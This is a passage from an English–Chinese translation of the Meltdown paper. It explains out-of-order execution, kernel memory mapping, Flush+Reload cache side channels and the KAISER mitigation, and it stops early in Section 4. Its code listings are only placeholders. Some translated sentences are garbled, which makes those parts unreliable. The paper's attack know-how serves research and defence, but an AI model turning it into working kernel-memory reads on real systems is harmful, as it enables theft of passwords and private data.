Meltdown: Reading Kernel Memory from User Space paper translation

Meltdown: Reading Kernel Memory from User Space翻译

Abstract

The security of computer systems fundamentally relies on memory isolation, e.g., kernel address ranges are marked as non-accessible and are protected from user access. In this paper, we present Meltdown. Meltdown exploits side effects of out-of-order execution on modern processors to read arbitrary kernel-memory locations including personal data and passwords. Out-of-order execution is an indispensable performance feature and present in a wide range of modern processors. The attack is independent of the operating system, and it does not rely on any software vulnerabilities. Meltdown breaks all security assumptions given by address space isolation as well as paravirtualized environments and, thus, every security mechanism building upon this foundation. On affected systems, Meltdown enables an adversary to read memory of other processes or virtual machines in the cloud without any permissions or privileges, affecting millions of customers and virtually every user of a personal computer. We show that the KAISER defense mechanism for KASLR [8] has the important (but inadvertent) side effect of impeding Meltdown. We stress that KAISER must be deployed immediately to prevent large-scale exploitation of this severe information leakage.
内存隔离是计算机系统安全的基础,例如:内核空间的地址段往往是标记为受保护的,用户态程序读写内核地址则会触发异常,从而阻止其访问。在这篇文章中,我们会详细描述这个叫Meltdown的硬件漏洞。Meltdown是利用了现代处理器上乱序执行(out-of-order execution)的副作用(side effect),使得用户态程序也可以读出内核空间的数据,包括个人私有数据和密码。由于可以提高性能,现代处理器广泛采用了乱序执行特性。利用Meltdown进行攻击的方法和操作系统无关,也不依赖于软件的漏洞。地址空间隔离带来的安全保证被Meltdown给无情的打碎了(半虚拟化环境也是如此),因此,所有基于地址空间隔离的安全机制都不再安全了。在受影响的系统中,Meltdown可以让一个攻击者读取其他进程的数据,或者读取云服务器中其他虚拟机的数据,而不需要相应的权限。这份文档也说明了KAISER(本意是解决KASLR不能解决的问题)可以防止Meltdown攻击。因此,我们强烈建议必须立即部署KAISER,以防止大规模、严重的信息泄漏。

1.简介(Introduction)

A central security feature of today's operating systems is memory isolation. Operating systems ensure that user applications cannot access each other's memories and prevent user applications from reading or writing kernel memory. This isolation is a cornerstone of our computing environments and allows running multiple applications on personal devices or executing processes of multiple users on a single machine in the cloud.
One of the core security features of today's operating systems is memory isolation. The so-called memory isolation means that the operating system must ensure that user applications cannot access each other's memory. In addition, it also prevents user applications from accessing the kernel space. On personal devices, multiple processes run in parallel and we need to isolate each other. In a cloud computing environment, multiple processes of multiple users (virtual machines) sharing the same physical host also coexist, and we cannot allow the processes of a certain user (virtual machine) to access the processes of other users (virtual machines). process data. Therefore, this kernel isolation is the cornerstone of our computing environment.
On modern processors, the isolation between the kernel and user processes is typically realized by a supervisor bit of the processor that defines whether a memory page of the kernel can be accessed or not. The basic idea is that this bit can only be set when entering kernel code and it is cleared when switching to user processes. This hardware feature allows operating systems to map the kernel into the address space of every process and to have very efficient transitions from the user process to the kernel, e.g., for interrupt handling. Consequently, in practice, there is no change of the memory mapping when switching from a user process to the kernel.
On modern processors, the isolation of the kernel and user address spaces is usually implemented by a bit in the processor control register (this bit is called the supervisor bit, which identifies the current mode of the processor), which defines whether the kernel can be accessed The memory page of the space. The basic idea is: this bit is set equal to 1 when the kernel code is executed, and the bit is cleared when switching to the user process. With the support of this hardware feature, the operating system can map the kernel address space to each process. During the execution of the user process, it is often necessary to switch from the user space to the kernel space. For example, the user process requests the service of the kernel space through a system call, or when an interruption occurs in the user space, it needs to switch to the kernel space to execute the interrupt handler. Handles asynchronous events from peripherals. Considering that the frequency of switching from user mode to kernel mode is very high, if the address space does not need to be switched during this process, then the system performance will not be affected.
In this work, we present Meltdown1. Meltdown is a novel attack that allows overcoming memory isolation completely by providing a simple way for any user process to read the entire kernel memory of the machine it executes on, including all physical memory mapped in the kernel region. Meltdown does not exploit any software vulnerability, i.e., it works on all major operating systems. Instead, Meltdown exploits side-channel information available on most modern processors, e.g., modern Intel microarchitectures since 2010 and potentially on other CPUs of other vendors.
While side-channel attacks typically require very specific knowledge about the target application and are tailored to only leak information about its secrets, Meltdown allows an adversary who can run code on the vulnerable processor to obtain a dump of the entire kernel address space, including any mapped physical memory. The root cause of the simplicity and strength of Meltdown are side effects caused by out-of-order execution.
In this work, we propose a new approach to exploit the meltdown vulnerability, by which any user process can break the isolation of the operating system's address space and read the kernel space in a simple way The data, here includes all physical memory mapped to the kernel address space. Meltdown does not take advantage of any software vulnerabilities, which means it is effective for any operating system. Instead, it exploits side-channel information on most modern processors (such as Intel microarchitectures from 2010 onwards, other CPU vendors may also lurk such problems). General side-channel attack (side-channel attack) needs to know the detailed information of the attack target, and then specify a specific attack method based on this information, so as to obtain secret data. The Meltdown attack method is not the case, it can dump the data of the entire kernel address space (including all physical memory mapped to the kernel address space). Meltdown attacks are very powerful, and the root cause is the use of side effects of out-of-order execution.
Out-of-order execution is an important performance feature of today’s processors in order to overcome latencies of busy execution units, e.g., a memory fetch unit needs to wait for data arrival from memory. Instead of stalling the execution, modern processors run operations out-of-order i.e., they look ahead and schedule subsequent operations to idle execution units of the processor. However, such operations often have unwanted side-effects, e.g., timing differences [28, 35, 11] can leak information from both sequential and out-of-order execution.
有时候CPU执行单元在执行的时候会需要等待操作结果,例如加载内存数据到寄存器这样的操作。为了提高性能,CPU并不是进入stall状态,而是采用了乱序执行的方法,继续处理后续指令并调度该指令去空闲的执行单元去执行。然而,这种操作常常有不必要的副作用,而通过这些执行指令时候的副作用,例如时序方面的差异[ 28, 35, 11 ],我们可以窃取到相关的信息。
From a security perspective, one observation is particularly significant: Out-of-order; vulnerable CPUs allow an unprivileged process to load data from a privileged (kernel or physical) address into a temporary CPU register. Moreover, the CPU even performs further computations based on this register value, e.g., access to an array based on the register value. The processor ensures correct program execution, by simply discarding the results of the memory lookups (e.g., the modified register states), if it turns out that an instruction should not have been executed. Hence, on the architectural level (e.g., the abstract definition of how the processor should perform computations), no security problem arises.
Although the performance has been improved, there are problems from a security point of view. The key point is: under out-of-order execution, the attacked CPU can run an unauthorized process to read data from an address that requires privileged access and load it into in a temporary register. The CPU can even perform further calculations based on the value of this temporary register, for example, accessing an array based on the value of this register. Of course, the CPU will eventually find this abnormal address access and discard the calculation results (for example, the modified register value). Although the instructions after those exceptions were executed in advance, in the end the CPU turned the tide and cleared the execution results, so it seems that nothing happened. This also ensures that there are no security issues from the perspective of the CPU architecture.
However, we observed that out-of-order memory lookups influence the cache, which in turn can be detected through the cache side channel. As a result, an attacker can dump the entire kernel memory by reading privileged memory in an out-of- order execution stream, and transmit the data from this elusive state via a microarchitectural cover channel (eg, Flush+Reload) to the outside world. On the receiving end of the covert channel, the register value is reconstructed. Hence, on the microarchitectural level (eg, the actual hardware implementation), there is an exploitable security problem.
However, we can observe the impact of out-of-order execution on caches, and thus launch attacks based on the side-channel information provided by these caches. The specific attack is as follows: the attacker uses the out-of-order execution feature of the CPU to read the memory address that requires privileged access and load it into a temporary register. The program will use the data stored in the register to affect the state of the cache. Then the attacker builds a covert channel (for example, Flush+Reload) to transmit the data, and reconstructs the register value at the receiving end of the covert channel. Therefore, there is indeed a security problem at the level of the CPU microarchitecture (related to the actual CPU hardware implementation).
Meltdown breaks all security assumptions given by the CPU’s memory isolation capabilities. We evaluated the attack on modern desktop machines and laptops, as well as servers in the cloud. Meltdown allows an unprivileged process to read data mapped in the kernel address space, including the entire physical memory on Linux and OS X, and a large fraction of the physical memory on Windows. This may include physical memory of other processes, the kernel, and in case of kernel-sharing sandbox solutions (e.g., Docker, LXC) or Xen in paravirtualization mode, memory of the kernel (or hypervisor), and other co-located instances. While the performance heavily depends on the specific machine, e.g., processor speed, TLB and cache sizes, and DRAM speed, we can dump kernel and physical memory with up to 503KB/s. Hence, an enormous number of systems are affected.
The CPU's hard-working kernel isolation capability is easily broken by Meltdown. We performed attacks on modern desktops, laptops, and cloud servers, and found that on systems such as Linux and OS X, meltdown can cause user processes to dump all physical memory (since all physical memory is mapped into the kernel address space). In the Window system, meltdown allows the user process to dump most of the physical memory. This physical memory may contain data from other processes or data from the kernel. In a shared kernel sandbox solution (such as Docker, LXC) or Xen in paravirtualization mode, the physical memory data of the dump also includes the kernel (ie hypervisor) and other guest OS data. Depending on the system (such as processor speed, TLB and cache size, and DRAM speed), the dump memory speed can be as high as 503kB/S. Therefore, the impact of Meltdown is very wide-ranging.
The countermeasure KAISER [8], originally developed to prevent side-channel attacks targeting KASLR, inadvertently protects against Meltdown as well. Our evaluation shows that KAISER prevents Meltdown to a large extent. Consequently, we stress that it is of utmost importance to deploy KAISER on all operating systems immediately. Fortunately, during a responsible disclosure window, the three major operating systems (Windows, Linux, and OS X) implemented variants of KAISER and will roll out these patches in the near future.
我们提出的对策是KAISER[ 8 ],KAISER最初是为了防止针对KASLR的侧信道攻击,不过无意中也意外的解决了Meltdown漏洞。我们的评估表明,KAISER在很大程度上防止了Meltdown,因此,我们强烈建议在所有操作系统上立即部署KAISER。幸运的是,三大操作系统(Windows、Linux和OS X)都已经实现了KAISER变种,并会在不久的将来推出这些补丁。
Meltdown is distinct from the Specter Attacks [19] in several ways, notably that Specter requires tailoring to the victim process's software environment, but applies more broadly to CPUs and is not mitigated by KAISER. Meltdown and Specter attacks
[ 19] There are several differences. The most obvious difference is that launching a ghost attack requires understanding the software environment of the victim process and modifying the specific attack method based on this information. However, there are Specter vulnerabilities on more CPUs, and KAISER has no effect on Specter.
Contributions. The contributions of this work are:

  1. We describe out-of-order execution as a new, extremely powerful, software-based side channel.
  2. We show how out-of-order execution can be combined with a microarchitectural covert channel to
    transfer the data from an elusive state to a receiver on the outside.
  3. We present an end-to-end attack combining out-oforder execution with exception handlers or TSX, to read arbitrary physical memory without any permissions or privileges, on laptops, desktop machines,
    and on public cloud machines.
  4. We evaluate the performance of Meltdown and the effects of KAISER on it.
    这项工作的贡献包括:
    1、 我们首次发现可以通过乱序执行这个侧信道发起攻击,攻击力度非常强大
    2、 我们展示了如何通过乱序执行和处理器微架构的隐蔽通道来传输数据,泄露信息。
    3、 我们展示了一种利用乱序执行(结合异常处理或者TSX)的端到端的攻击方法。通过这种方法,我们可以在没有任何权限的情况下读取了笔记本电脑,台式机和云服务器上的任意物理内存。
    4、 我们评估了Meltdown的性能以及KAISER对它的影响
    Outline. The remainder of this paper is structured as follows: In Section 2, we describe the fundamental problem which is introduced with out-of-order execution. In Section 3, we provide a toy example illustrating the side channel Meltdown exploits. In Section 4, we describe the building blocks of the full Meltdown attack. In Section 5, we present the Meltdown attack. In Section 6, we evaluate the performance of the Meltdown attack on several different systems. In Section 7, we discuss the effects of the software-based KAISER countermeasure and propose solutions in hardware. In Section 8, we discuss related work and conclude our work in Section 9.
    本文概述:本文的其余部分的结构如下:在第2节中,我们描述了乱序执行带来的基本问题,在第3节中,我们提供了一个简单的示例来说明Meltdown利用的侧信道。在第4节中,我们描述了Meltdown攻击的方块结构图。在第5节中,我们展示如何进行Meltdown攻击。在第6节中,我们评估了几种不同系统上的meltdown攻击的性能。在第7节中,我们讨论了针对meltdown的软硬件对策。软件解决方案主要是KAISER机制,此外,我们也提出了硬件解决方案的建议。在第8节中,我们将讨论相关工作,并在第9节给出我们的结论。

2.背景介绍(Background)

In this section, we provide background on out-of-order execution, address translation, and cache attacks.
这一小节,我们将描述乱序执行、地址翻译和缓存攻击的一些基本背景知识。

2.1乱序执行(Out-of-order execution)

Out-of-order execution is an optimization technique that allows to maximize the utilization of all execution units of a CPU core as exhaustive as possible. Instead of processing instructions strictly in the sequential program order, the CPU executes them as soon as all re required resources are available. While the execution unit of the current operation is occupied, other execution units can run ahead. Hence, instructions can be run in parallel as long as their results follow the architectural definition. Out-of-order execution is an optimization technique through
which Technology can use the execution units in the CPU core as much as possible. Unlike sequential CPUs, CPUs that support out-of-order execution do not need to execute codes in program order. As long as the resources for instruction execution are OK (not occupied), they will enter the execution unit for execution. If the execution unit involved in the current instruction is occupied, other instructions can run ahead (if the execution unit involved in the instruction is free). Thus, under out-of-order execution, instructions can run in parallel as long as the result is as defined by the architecture.
In practice, CPUs supporting out-of-order execution support running operations speculatively to the extent that the processor's out-of-order logic processes instructions before the CPU is certain whether the instruction will be needed and committed. speculative execution in a more restricted meaning, where it refers to an instruction sequence following a branch, and use the term out-of-order execution to refer to any way of getting an operation executed before the processor has committed the results of all prior instructions .
In practice, the CPU's out-of-order execution and speculative execution (speculative execution) are bundled together. When the CPU cannot determine whether the next instruction must be executed, it often predicts, and completes out-of-order execution according to the predicted result. In this paper, speculative execution is considered a restricted concept, which specifically refers to the execution of the instruction sequence after the jump instruction. The term out-of-order execution means that the processor executes the current instruction ahead of time before committing the results of all previous instructions.
In 1967, Tomasulo [33] developed an algorithm [33] that enabled dynamic scheduling of instructions to allow out-of-order execution. Tomasulo [33] introduced a unified reservation station that allows a CPU to use a data value as it has been computed instead of storing it to a register and re-reading it. The reservation station renames registers to allow instructions that operate on the same physical registers to use the last logical one to solve read-after-write (RAW), write-after-read (WAR) and write-after-write (WAW) hazards. Furthermore, the reservation unit connects all execution units via a common data bus (CDB). If an operand is not available, the reservation unit can listen on the CDB until it is available and then directly begin the execution of the instruction.
In 1967, Tomasulo designed an algorithm [33][33] that implements dynamic scheduling of instructions, thus allowing out-of-order execution. Tomasulo [33] designed a unified reservation station for CPU execution units. In the past, CPU execution units needed to read operands from registers or write results to registers. Now, with the reservation station, CPU execution units can use it to read operands and save operation results. We give a specific example of RAW (read-after-write):
R2 <- R1 + R3
R4 <- R2 + R3
The first instruction is to calculate R1+R3 and save the result to R2, the second instruction depends on Calculated on the value of R2. When there is no reserved station, the second instruction can be executed after the operation result of the first instruction is submitted to the R2 register, because the operand needs to be loaded from the R2 register. If there is a reservation station, then we can rename the register R2 in the reservation station, we call this register R2.rename. At this time, after the first instruction is executed, the result is saved in the R2.rename register without submitting the final result to the R2 register, so that the second instruction can directly obtain the operand from the R2.rename register and Execute, thus solving the hazard caused by RAW. WAR is similar to WAW and will not be repeated here. (Note: I made some extensions to the translation of the above sentence to facilitate the understanding of the reservation station). In addition, the reserved station is connected with all execution units through a unified CDB (common data bus). If the operand is not ready, the execution unit can listen to the CDB, and once the operand is obtained, the execution unit will immediately start the execution of the instruction.
Figure 1. Simplified schematic diagram of a single core in Intel's Skylake microarchitecture. Instructions have been decoded into uOPS and executed out-of-order by a single execution unit in the execution engine.
Figure 1: Simplified illustration of a single core of the Intel's Skylake microarchitecture. Instructions are decoded into uOPs and executed out-of-order in the execution engine by individual execution units
. , the instructions have been decoded into uOPs and executed out-of-order by a single execution unit in the execution engine]
On the Intel architecture, the pipeline consists of the front-end, the execution engine (back-end) and the memory subsystem [14]. x86 instructions are fetched by the front-end from the memory and decoded to microoperations (μOPs) which are continuously sent to the execution engine. Out-of-order execution is implemented within the execution engine as illustrated in Figure 1. The Reorder Buffer is responsible for register allocation, register renaming and retiring. Additionally, other optimizations like move elimination or the recognition of zeroing idioms are directly handled by the reorder buffer. The μOPs are forwarded to the Unified Reservation Station that queues the operations on exit ports that are connected to Execution Units. Each execution unit can perform different tasks like ALU operations, AES operations, address generation units (AGU) or memory loads and stores. AGUs as well as load and store execution units are directly connected to the memory subsystem to process its requests.
In the Intel CPU architecture, the pipeline is composed of a front end, an execution engine (back end), and a memory subsystem [14]. The front-end module reads the x86 instructions from the memory and decodes them into micro-operations (μOPS, microoperations), and the uOPS is then sent to the execution engine. Out-of-order execution is implemented in the execution engine, as shown in the figure above. The Reorder Buffer is responsible for register allocation, register renaming, and committing results to software-visible registers (this process is also known as retirement). In addition, the reorder buffer has some other functions, such as move elimination, identification of zeroing idioms, etc. uOPS are sent to the unified reservation station and queued on the output port of the reservation station, which is directly connected to the execution unit. Each execution unit can perform different tasks, such as ALU operation, AES operation, address generation unit (AGU), memory load and memory store. The three execution units, AGU, memory load, and memory store, are directly connected to the storage subsystem to process memory requests.
Since CPUs usually do not run linear instruction streams, they have branch prediction units that are used to obtain an educated guess of which instruction will be executed next. Branch predictors try to determine which direction of a branch will be taken before its con dition is actually evaluated . Instruments that Lie on that Path and do not have any dependencies can be executed in advance and their resultation used if the predict was correct. If The Reordering Was Incorrect, The REORDER BUFFER Allows to Rollback by Clearing the Reorder Buffer and Re-Initialization the unified reservation station.
Since the CPU doesn't always run a linear instruction stream, it has a branch prediction unit. This unit can record the results of past program jumps and use it to speculate on the next instruction that might be executed. The branch prediction unit determines the program jump path before the actual condition is checked. Instructions located on that path can be executed early if they do not have any dependencies. If the prediction is correct, the result of the instruction execution is available immediately. If the prediction is incorrect, the reorder buffer can roll back the operation result, and the specific rollback is done by clearing the reorder buffer and initializing the unified reservation station.
Various approaches to predict the branch exist: With static branch prediction [12], the outcome of the branch is solely based on the instruction itself. Dynamic branch prediction [2] gathers statistics at run-time to predict the outcome. One-level branch prediction uses a 1-bit or 2-bit counter to record the last outcome of the branch [21]. Modern processors often use two-level adaptive predictors [36] that remember the history of the last n outcomes allow to predict regularly recurring patterns. More recently, ideas to use neural branch prediction [34, 18, 32] have been picked up and integrated into CPU architectures [3].
There are various approaches to branch prediction: When using static branch prediction [12], the result of the program jump is based entirely on the instruction itself. Dynamic branch prediction [2] collects statistical data at runtime to predict the outcome. Level-1 branch prediction uses 1-bit or 2-bit counters to record jump results [21]. Modern processors usually use a two-stage adaptive predictor [36], which remembers the last n historical jump results and looks for regular jump patterns through these historical jump records. Recently, the idea of ​​using neural branch prediction [34, 18, 32] was picked up and integrated into CPU architectures [3].

2.2 address space (address space)

To isolate processes from each other, CPUs support virtual address spaces where virtual addresses are translated to physical addresses. A virtual address space is divided into a set of pages that can be individually mapped to physical memory through a multi-level page translation table. The translation tables define the actual virtual to physical mapping and also protection properties that are used to enforce privilege checks, such as readable, writable, executable and user-accessible. The currently used translation table that is held in a special CPU register. On each context switch, the operating system updates this register with the next process’ translation table address in order to implement per process virtual address spaces. Because of that, each process can only reference data that belongs to its own virtual address space. Each virtual address space itself is split into a user and a kernel part. While the user address space can be accessed by the running application, the kernel address space can only be accessed if the CPU is running in privileged mode. This is enforced by the operating system disabling the user accessible property of the corresponding translation tables. The kernel address space does not only have memory mapped for the kernel’s own usage, but it also needs to perform operations on user pages, e.g., filling them with data. Consequently, the entire physical memory is typically mapped in the kernel. On Linux and OS X, this is done via a direct-physical map, i.e., the entire physical memory is directly mapped to a pre-defined virtual address (cf. Figure 2).
insert image description here
In order to isolate processes from each other, the CPU supports a virtual address space, but the CPU sends a physical address to the bus, so the virtual address in the program needs to be converted into a physical address. The virtual address space is divided into individual pages, and these pages can be mapped to physical pages through multi-level page tables. In addition to the mapping of virtual addresses to physical addresses, the page table also defines protection attributes, such as readable, writable, executable, and user-mode accessible. The currently used page table is stored in a special CPU register (for X86, this register is cr3, and for ARM, this register is the TTBR series register). In context switching, the operating system will always update this register with the page table address of the next process, thus realizing the switching of the virtual address space of the process. Therefore, each process can only access data belonging to its own virtual address space. The virtual address space of each process is itself divided into user address space and kernel address space portions. When the process is running in user mode, it can only access the user address space, and only in the kernel mode (the CPU runs in privileged mode) can it access the kernel address space. The operating system will disable the user-accessible attribute in the page table corresponding to the kernel address space, thereby prohibiting the user mode from accessing the kernel space. The kernel address space not only establishes a memory map for itself (such as the kernel's text segment, data segment, etc.), but also needs to operate on user pages, such as filling data. Therefore, physical memory throughout the system is usually mapped in the kernel address space. On Linux and OS X, this is done with direct-physical mapping, that is, the entire physical memory is mapped directly to predefined virtual addresses (see diagram above).
Instead of a direct-physical map, Windows maintains a multiple so-called paged pools, non-paged pools, and the system cache. These pools are virtual memory regions in the kernel address space mapping physical pages to virtual addresses which are either required to remain in the memory (non-paged pool) or can be removed from the memory because a copy is already stored on the disk (paged pool). The system cache further contains mappings of all file-backed pages. Combined, these memory pools will typically map a large fraction of the physical memory into the kernel address space of every process.
Windows中的地址映射机制,没有兴趣了解。
The exploitation of memory corruption bugs often requires the knowledge of addresses of specific data. In order to impede such attacks, address space layout randomization (ASLR) has been introduced as well as nonexecutable stacks and stack canaries. In order to protect the kernel, KASLR randomizes the offsets where drivers are located on every boot, making attacks harder as they now require to guess the location of kernel data structures. However, side-channel attacks allow to detect the exact location of kernel data structures [9, 13, 17] or derandomize ASLR in JavaScript [6]. A combination of a software bug and the knowledge of these addresses can lead to privileged code execution.
Attacks using memory corruption (referring to modifying the contents of memory to cause crash) bugs often need to know the address of specific data (because we need to modify the data in the address). In order to prevent this attack, the kernel provides address space layout randomization (ASLR), non-executable stack and stack overflow checks. In order to protect the kernel, KASLR will place the driver in a random offset position every time it is booted and loaded. This method makes the attack more difficult, because the attacker needs to guess the address information of the kernel data structure. However, attackers can use side-channel attacks to obtain certain locations of kernel data structures [9, 13, 17] or derandomize ASLR in JavaScript [6]. Combining the two mechanisms described in this section, we can launch an attack to achieve privileged code execution.

2.3 Cache Attacks

In order to speed-up memory accesses and address translation, the CPU contains small memory buffers, called caches, that store frequently used data. CPU caches hide slow memory access latencies by buffering frequently used data in smaller and faster internal memory .Modern CPUs have Multiple levels of caches that are either private to its cores or shared among them. Address space translation tables are also stored in memory and are also cached in the regular caches. In order to speed up memory access
and address translation process, CPU contains some small The memory buffer, which we call cache, is used to store recently frequently used data. In this way, the CPU cache actually hides the access delay of the underlying slow memory. Modern CPUs have multiple levels of caches that either belong to a specific CPU core or are shared among multiple CPU cores. The page table of the address space is stored in memory, and it is also cached in the cache (ie TLB).
Cache side-channel attacks exploit timing differences that are introduced by the caches. Different cache attack techniques have been proposed and demonstrated in the past, including Evict+Time [28], Prime+Probe [28, 29], and Flush+Reload [35]. Flush+Reload attacks work on a single cache line granularity. These attacks exploit the shared, inclusive last-level cache. An attacker frequently flushes a targeted memory location using the clflush instruction. By measuring the time it takes to reload the data, the attacker determines whether data was loaded into the cache by another process in the meantime. The Flush+Reload attack has been used for attacks on various computations, e.g., cryptographic algorithms [35, 16, 1], web server function calls [37], user input [11, 23, 31], and kernel addressing information [9].
Cache side-channel attack (Cache side-channel attack) is a method of using the time difference introduced by the cache to attack. When accessing memory, the data that has been cached will be accessed very quickly, while the data that has not been cached will be accessed very quickly. Slow, cache side-channel attacks use this time difference to steal data. Various cache attack techniques have been proposed and proven effective, including Evict+Time [28], Prime+Probe [28, 29], Flush+Reload [35]. The Flush+Reload method works on a single cache line granularity. Cache side-channel attacks mainly use the shared cache (including the last level cache) to attack. Attackers often use the CLFLUSH instruction to flush the cache of the target memory location. Then read the data in the target memory and measure the time required to load the data in the target memory. Through this time information, an attacker can obtain whether another process has loaded data into the cache. Flush+Reload attacks have been used to attack various algorithms, for example, cryptographic algorithms [35, 16, 1], web server function calls [37], user input [11, 23, 31], and kernel addressing information [9 ].
A special use case are covert channels. Here the attacker controls both, the part that induces the side effect, and the part that measures the side effect. This can be used to leak information from one security domain to another, while bypassing any boundaries existing On the architectural level or above. Both Prime+Probe and Flush+Reload have been used in high-performance covert channels [24, 26, 10]. A special usage scenario for
cache side-channel attacks is to construct covert channels. In this scenario, the attacker controls the sender and receiver of the covert channel, that is to say, the attacker will trigger the cache side effect through the program, and he will also measure the cache side effect. By such means, information can leak from one security domain to the outside world, bypassing architectural-level bounds checks. Both methods, Prime+Probe and Flush+Reload, have been used to build high-performance covert channels [24, 26, 10].

3. Simple example (A toy example)

In this section, we start with a toy example, a simple code snippet, to illustrate that out-of-order execution can change the microarchitectural state in a way that leaks information. However, despite its simplicity, it is used as a basis for Section 4 and Section 5, where we show how this change in state can be exploited for an attack.
In this chapter, we give a simple example and illustrate how the example code can be executed on an out-of-order CPU Changes the microarchitectural state of the CPU and leaks information. Despite its simplicity, it can still serve as the basis for Chapters 4 and 5 (where we will demonstrate the meltdown attack in detail).
Listing 1 shows a simple code snippet first raising an (unhandled) exception and then accessing an array. The property of an exception is that the control flow does not continue with the code after the exception, but jumps to an exception handler in the operating system . Regardless of whether this exception is raised due to a memory access, eg, by accessing an invalid address, or due to any other CPU exception, eg, a division by zero, the control flow continues in the kernel and not with the next user. space instruction.
insert image description here
The listing above shows a simple code snippet: first trigger an exception (we don't handle it), then access the probe_array array. The exception will cause the control flow to not execute the code after the exception, but jump to the exception handler in the operating system to execute. Regardless of whether the exception is caused by a memory access (such as accessing an invalid address), or due to other types of CPU exceptions (such as division by zero), the control flow will go to the kernel to continue execution instead of staying in user space. Access to the probe_array array.
Thus, our toy example cannot access the array in theory, as the exception immediately traps to the kernel and terminates the application. However, due to the out-of-order execution, the CPU might have already executed the following instructions as there is no dependency on the exception. This is illustrated in Figure 3. Due to the exception, the instructions executed out of order are not retired and, thus, never have architectural effects. Therefore, the
insert image description here
sample code we give will theoretically not access probe_array array, after all the exception immediately traps the kernel and terminates the application. But due to out-of-order execution, the CPU may have executed those instructions after the exception instruction, knowing that the exception instruction and subsequent instructions have no dependencies. As shown in FIG. Although the instructions following the exception instruction were executed, those instructions were not committed due to the exception (Note: instruction retire and instruction commit both mean the same thing, which means that the execution result of the instruction is reflected in the register or memory visible to the software , but the term retire is easily misunderstood when translated into Chinese, so this article uniformly translates retire as submitting or not translating), so there is no problem from the perspective of CPU architecture (that is to say, software engineers cannot see these instructions from the perspective of ISA execution).
Although the instructions executed out of order do not have any visible architectural effect on registers or memory, they have microarchitectural side effects. During the out-of-order execution, the referenced memory is fetched into a register and is also stored in the cache. If the out-of-order execution has to be discarded, the register and memory contents are never committed. Nevertheless, the cached memory contents are kept in the cache. We can leverage a microarchitectural side-channel attack such as Flush+Reload [35], which detects whether a specific memory location is cached, to make this microarchitectural state visible. There are other side channels as well which also detect whether a specific memory location is cached, including Prime+Probe [28, 24, 26], Evict+ Reload [23], or Flush+Flush [10]. However, as Flush+ Reload is the most accurate known cache side channel and is simple to implement, we do not consider any other side channel for this example.
Although the program order is violated and instructions that should not be executed are executed on the CPU, in fact, from the perspective of registers and memory, we cannot capture any changes caused by these instructions (that is, there is no architecture effect). However, from the perspective of CPU microarchitecture, there are indeed side effects. During out-of-order execution, loading a memory value into a register also saves the value in the cache. If the results of out-of-order execution must be discarded, neither register nor memory values ​​will be committed. However, the content in the cache is not discarded, it is still in the cache. At this time, we can use microarchitectural side-channel attack (microarchitectural side-channel attack) methods, such as Flush+Reload [35], to detect whether the specified memory address is cached, so that these microarchitectural state information becomes Visible to users. We also have other methods to detect whether a memory address is cached, including: Prime+Probe [28, 24, 26], Evict+ Reload [23], or Flush+Flush [10]. However, Flush+ Reload is the most accurate way to perceive the cache side channel, and it is very simple to implement, so in this article we mainly introduce Flush+ Reload.
Based on the value of data in this toy example, a different part of the cache is accessed when executing the memory access out of order. As data is multiplied by 4096, data accesses to probe array are scattered over the array with a distance of 4 kB (assuming an 1 B data type for probe array). Thus, there is an injective mapping from the value of data to a memory page, i.e., there are no two different values of data which result in an access to the same page. Consequently, if a cache line of a page is cached, we know the value of data. The spreading over different pages eliminates false positives due to the prefetcher, as the prefetcher cannot access data across page boundaries [14].
Let's go back again to the example code in the listing above. probe_array is an array organized by 4KB bytes, and the array can be traversed and accessed by changing the value of the data variable according to the 4K size. If a 4K memory block in the probe_array array specified by the data variable is accessed during out-of-order execution, the data of the corresponding page (referring to the 4K memory block in the probe_array array) will be loaded into the cache. Therefore, the value of data can be deduced by scanning the cache of each page in the probe_array array through the program (the data value and the pages in the probe_array array are in one-to-one correspondence). In Intel processors, the prefetcher does not cross page boundaries, so the cache state between page sizes is completely independent. In the program, the detection of the cache is distributed to several pages mainly to prevent false positives caused by the prefetcher.
Figure 4 shows the result of a Flush+Reload measurement iterating over all pages, after executing the out-oforder snippet with data = 84. Although the array access should not have happened due to the exception, we can clearly see that the index which would have been accessed is cached. Iterating over all pages (e.g., in the exception handler) shows only a cache hit for page 84 This shows that even instructions which are never actually executed, change the microarchitectural state of the CPU. Section 4 modifies this toy example to not read a value, but to leak an inaccessible secret.
insert image description here
The above figure is a coordinate diagram drawn by traversing each page in the probe_array array through the Flush+Reload method and calculating the access time of the page data. The abscissa is the page index, a total of 256, and the ordinate is the access time. If the cache miss, the access time is about 400 cycles. If the cache hit, the access time is about 200 cycles. There is a significant difference between the two . From the figure above, we can see that although access to the probe_array array should not occur due to an exception, it is obviously a cache hit on data=84, which also shows that under out-of-order execution, instructions that should not be executed will also affect CPU microarchitecture state, in the following sections, we will modify the sample code to steal secret data.

4. Meltdown attack architecture diagram (Building block of attack)

The toy example in Section 3 illustrated that side-effects of out-of-order execution can modify the microarchitectural state to leak information. While the code snippet reveals the data value passed to a cache-side channel, we want to show how this technique can be leveraged to leak otherwise inaccessible secrets. In this section, we want to generalize and discuss the necessary building blocks to exploit out-of-order execution for an attack. In the previous chapter, we demonstrated out-of-order execution through a simple sample
code A side effect of modifying the microarchitectural state can cause information leakage. Through the code snippet, we have seen that the value of the data variable has been passed to the cache side channel. Next, we will detail how to use this technique to leak protected data. In this chapter, we outline and discuss the components required to exploit out-of-order execution attacks.
The adversary targets a secret value that is kept somewhere in physical memory. Note that register contents are also stored in memory upon context switches, ie, they are also stored in physical memory. As described in Section 2.2, the address space of ever y process typically includes the entire user space, as well as the entire kernel space, which typically also has all physical memory (inuse) mapped. However, these memory regions are only accessible in privileged mode (cf. Section 2.2). The attacker's goal is to
save A secret value in physical memory. Note: Register values ​​are also saved in physical memory across context switches. According to Section 2.2, the address space of each process usually includes the entire user address space and the entire kernel address space (the physical memory in use will be mapped into this space), although the process can perceive the mapping of the kernel space. But these memory regions can only be accessed in privileged mode (see Section 2.2).
In this work, we demonstrate leaking secrets by bypassing the privileged-mode isolation, giving an attacker full read access to the entire kernel space including any physical memory mapped, including the physical memory of any other process and the kernel. Note that Kocher et al. [19] pursue an orthogonal approach, called Spectre Attacks, which trick speculative executed instructions into leaking information that the victim process is authorized to access. As a result, Spectre Attacks lack the privilege escalation aspect of Meltdown and require tailoring to the victim process’s software environment, but apply more broadly to CPUs that support speculative execution and are not stopped by KAISER.
